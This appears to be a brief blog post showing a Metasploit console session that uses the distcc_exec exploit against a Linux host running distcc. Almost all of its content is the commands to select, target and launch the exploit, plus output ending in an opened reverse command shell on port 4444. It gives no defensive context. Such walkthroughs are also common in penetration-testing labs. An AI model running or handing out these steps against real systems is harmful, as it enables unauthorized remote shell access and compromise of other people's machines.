control – metasploit distcc_exec linux

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set rhost IP-Address
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo 9sJn4OfgbKkZg3bL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “9sJn4OfgbKkZg3bL\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:58894) at 2010-02-21 12:52:15 +0100


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s